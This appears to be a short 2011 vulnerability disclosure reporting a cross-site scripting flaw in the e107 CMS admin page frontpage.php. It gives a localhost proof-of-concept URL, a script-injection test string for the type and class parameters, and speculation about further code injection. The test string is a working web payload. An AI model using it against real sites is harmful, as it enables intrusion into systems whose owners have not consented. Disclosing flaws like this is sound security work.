Kod:# exploit title: xss in e107 (for logged only) # date: 12.o2.2o11 # author: lemlajt # software : e107 # version: 2010-08-22 / 0.7 (?) # tested on: linux # cve : # PoC : http://localhost/www/cmsadmins/e107/e107_admin/frontpage.php $type and $class parameters are vulnerable to cross site scripting. try: '';!--<script>alert(1)</script>={()} btw: when you see xss, try to refresh this page with proxy (paros, or similar), and you should see more parameters: {()} (twice), so maybe here is just some noname error, or maybe we can inject code(?) info: cat /e107/e107_files/e107.js | e107 website system - Javascript File. | | $URL: https://e107.svn.sourceforge.net/svnroot/e107/trunk/e107_0.7/e107_files/e107.js $ | $Revision: 11678 $ | $Id: e107.js 11678 2010-08-22 00:43:45Z e107coders $ # regards, # lemlajt # *